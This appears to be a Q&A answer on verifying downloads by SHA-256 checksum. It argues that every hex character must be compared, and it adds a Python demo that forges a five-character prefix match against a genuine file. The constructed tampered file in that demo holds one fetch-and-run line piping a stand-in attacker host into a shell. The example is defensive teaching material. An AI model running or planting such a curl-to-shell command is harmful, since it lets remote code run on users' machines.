Checksums are useful for verifying that a file, such as a downloaded dmg, has not been changed. But it's tedious to examine the entire checksum, since a SHA-256 checksum has 64 hex characters. Fortunately, the algorithm is designed such that two files with a small difference in content will have very different checksums.
Still, I want to be sure, so just how many characters do I need to compare to safely verify that two files are identical? Is it sufficient to compare, say, the first or last 5 characters?
Quick
You should check every character. You shouldn't check it on your own. For Windows/PowerShell, use this:
Get-FileHash ./relativeLocationOfFileToCompare | Select-Object -ExpandProperty Hash | Compare-Object theHashYouWantToCompare
# No output means the hashes match. Compare-Object is case-insensitive by default, so the uppercase hash printed by Get-FileHash still matches a lowercase published hash; if the two differ, both values are printed with a <= / => side indicator.
e.g.
Get-FileHash ./kali-linux-2020.4-vbox-i386.ova | Select-Object -ExpandProperty Hash | Compare-Object 64f6ca69ccb3efc79e350977d33109c380a744c26158c4e3956141535242e2ca
More
You need to check every character, because malicious parties can create partial collisions, i.e. files where the first 20 characters are the same.
My understanding of why checksums are used
You want software. You go to the actual supplier website, e.g. kali.org. You click to download the software. Kali.org doesn't actually send you the software; they tell your browser to go to their CDN and download the software. The CDN is a slightly untrusted third party. The CDN could've gone rogue, or the CDN could be compromised. What to do?
Kali.org is not compromised (if Kali is, there are bigger issues and checksumming isn't used to combat them). Therefore, you can obtain the valid checksum from Kali.org. You get the hash and compare every character with the one-liner I provided. You've protected yourself from non-collisions and partial collisions, and you've probably saved some time by not comparing each character manually.
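An added example, not code from the original question or this answer, that works through both points above: how cheap it is to make a tampered file agree with the genuine one on only a handful of hex characters (the question's "first or last 5"), and how to compare the whole 64-character digest instead. The installer contents, the file name and the padding trailer are constructed for illustration; the tool names (Get-FileHash) are only mentioned in comments.

```python
"""Added example, not code from the original question or answer: how cheaply a
tampered file can be made to agree with a genuine one on only a few hex
characters of its SHA-256, and how to check all 64 characters instead.
All file contents are constructed in memory; no real download is involved."""
import hashlib
import hmac
import os
import tempfile
from typing import Tuple

SHA256_HEX_LEN = 64  # 256 bits = 64 hex characters


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def forge_partial_match(genuine: bytes, tampered: bytes, n: int,
                        from_end: bool = False) -> Tuple[bytes, int]:
    """Append a varying trailer to `tampered` until its SHA-256 agrees with the
    genuine file's digest on `n` hex characters (the first n, or the last n if
    from_end). Expected cost is about 16**n hash computations: seconds for
    n = 5, hopeless for n = 64. Returns the forged bytes and the attempt count."""
    target = sha256_hex(genuine)
    want = target[-n:] if from_end else target[:n]
    attempts = 0
    while True:
        attempts += 1
        # Constructed trailer; a real attacker would hide it in slack space,
        # a comment, or metadata the program never reads.
        candidate = tampered + b"\n# pad %d\n" % attempts
        digest = sha256_hex(candidate)
        have = digest[-n:] if from_end else digest[:n]
        if have == want:
            return candidate, attempts


def verify_sha256(path: str, expected_hex: str) -> bool:
    """The full check: hash the file in chunks and compare every hex character.
    Case is normalised because Get-FileHash prints uppercase while download
    pages usually publish lowercase. Anything that is not a 64-character hex
    string is rejected outright rather than compared as a prefix."""
    expected = expected_hex.strip().lower()
    if len(expected) != SHA256_HEX_LEN or any(c not in "0123456789abcdef" for c in expected):
        raise ValueError("expected a 64-character hex SHA-256 digest")
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return hmac.compare_digest(h.hexdigest(), expected)


def write_and_verify(data: bytes, expected_hex: str) -> bool:
    """Write `data` to a temporary file and run verify_sha256 on it."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "download.bin")
        with open(path, "wb") as f:
            f.write(data)
        return verify_sha256(path, expected_hex)


def demo(n: int = 5) -> dict:
    """Forge a tampered installer matching the genuine one on n characters,
    then show that only the full comparison catches it."""
    genuine = b"#!/bin/sh\necho 'installer v1'\n"        # constructed genuine file
    tampered = b"#!/bin/sh\ncurl evil.example | sh\n"    # constructed tampered file
    forged, attempts = forge_partial_match(genuine, tampered, n)
    return {
        "attempts": attempts,
        "prefix_matches": sha256_hex(forged)[:n] == sha256_hex(genuine)[:n],
        "full_matches": write_and_verify(forged, sha256_hex(genuine)),
    }


if __name__ == "__main__":
    result = demo(5)
    print("forged a 5-character prefix match in %d attempts" % result["attempts"])
    print("first 5 characters agree:", result["prefix_matches"])
    print("all 64 characters agree:", result["full_matches"])
```

Running `demo(5)` takes on the order of a million hash computations, which is a second or two in pure Python; that is the whole argument against comparing five characters. Comparing the last five instead of the first five changes nothing, which is why `forge_partial_match` takes a `from_end` flag. The verifier rejects short or non-hex "expected" strings instead of silently doing a prefix comparison, so a copy-paste that lost half the digest fails loudly rather than passing.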